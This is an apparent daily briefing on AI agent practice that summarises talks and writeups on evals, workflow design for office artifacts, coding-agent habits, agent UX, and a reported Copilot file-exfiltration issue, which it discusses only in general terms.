Agent Work Moves From Prompting to Workflow Control
Executive Summary
The strongest signal today is that serious AI work is being reframed as workflow design, not prompt craft. Across coding agents, office artifacts, evals, and agent UX, the common move is away from “ask the model better” and toward context discipline, visible execution, reversible actions, production-trace evaluation, and hostile verification before outputs are trusted.
What Happened
Several independent builder signals converged on the same operational lesson: capable models still fail when the surrounding system does not control context, review, and consequence.
In AI Engineer’s talk “The maturity phases of running evals”, Phil Hetzel argued that teams should stop treating evals like exhaustive unit tests. For agents, the useful starting point is observed failure: collect human judgments, preserve justifications, convert those into judge criteria, and then rerun realistic production or UAT traces offline. His most durable line was that teams should think of evals as “rerunning production,” especially once agents touch tools, external systems, and mutable state.
Nate B Jones made the same point from a knowledge-work angle in “Your Board Deck Has a Wrong Formula. Excel Won’t Flag It.”. His frame: a prompt asks for output; a workflow defines the stages the output must survive. For decks and spreadsheets, the stages are source inventory, explicit specification, constrained generation, and adversarial review. The important observation is not that AI can create Office files. It is that artifact generation is now easier than artifact trust, so the human job shifts toward owning assumptions, traceability, and review loops.
Theo’s “How I code with AI changed a lot” added a firsthand coding-agent perspective. His current practice emphasizes harness choice, multiple short task threads, plain-language goals, project-level intent notes, steering the model’s reasoning text, examples for hard requirements, and giving agents verification tools. The notable claim was that interface and runtime now matter as much as model selection: if the environment makes threading, context inspection, remote execution, image feedback, and resumption easier, the agent becomes more useful.
Why It Matters
This is a meaningful refinement of the agent discourse. Earlier waves often asked whether agents were “smart enough.” Today’s evidence says the practical frontier is whether the surrounding workflow can make their work legible, bounded, and correctable.
That showed up directly in AI Engineer’s “What the Best Agents Share”, which described better agent products as having focus modes, transparent execution, personalization, and reversibility. The point is not simply nicer UX. Transparency turns delegation into collaboration by exposing steps, tool calls, uncertainty, and intermediate state. Reversibility bounds the cost of mistakes through rollbacks, accept/reject granularity, and review tooling.
But transparency is not a complete safety story. Simon Willison’s writeup on Microsoft Copilot Cowork exfiltrating files is the sharp counterweight: if an agent can send email without sufficient approval, and rendered mail can leak data through external image or network requests, ordinary product features become security boundaries. The lesson pairs cleanly with the UX discourse: visible execution and rollbacks help humans supervise work, but agentic systems still need hard containment around tool permissions, rendering surfaces, and data egress.
The Bigger Story
The canon developing here is less “prompt engineering is dead” than “prompting has been absorbed into a broader operating model.” Context is now treated as infrastructure. In AI Engineer’s “Stop babysitting your agents...”, Brandon Walsenuk argued that many coding-agent failures are context failures, not intelligence failures: access to docs, Slack, code, and tickets is not the same as understanding which source matters, which permissions apply, and whose norm should win.
That organizational layer also appeared in Nate B Jones’s discussion of Shopify’s internal agent River, “Shopify CEO Reveals Their Secret AI Developer”. The most interesting claim was not the volume of AI-generated PRs; it was the decision to keep agent work visible in public team channels. If AI work happens only in private chats, individuals get faster while the organization fails to learn. Public, non-sensitive agent work creates shared examples of task framing, correction, review, and reusable practice.
There was one adjacent infrastructure thread worth preserving: Alex Cheema’s “Frontier AI at Home” framed local inference as a stack problem involving memory bandwidth, decode performance, quantization, kernels, orchestration, energy, and heterogeneous hardware. It fits the same broader shift: trust in AI systems is increasingly shaped by the whole operating environment, not just the model.
Workflow Implications
For operators, the takeaway is concrete: stop evaluating AI adoption by output volume alone. Ask whether each workflow has context ownership, observable execution, reversible actions, trace capture, failure-mode review, and a second-pass verifier. If the artifact cannot explain where its claims, formulas, or code changes came from, it is not finished; it is only generated.
Further Reading
- Jack Clark, Import AI 458: Reckoning with the future and a singularity story — worth saving as a long-horizon companion piece, though today’s evidence supported the practical agent-workflow thread more strongly.
- Ethan Mollick, Choosing to Stay Human — relevant to the parallel authenticity discussion around AI-mediated human communication.


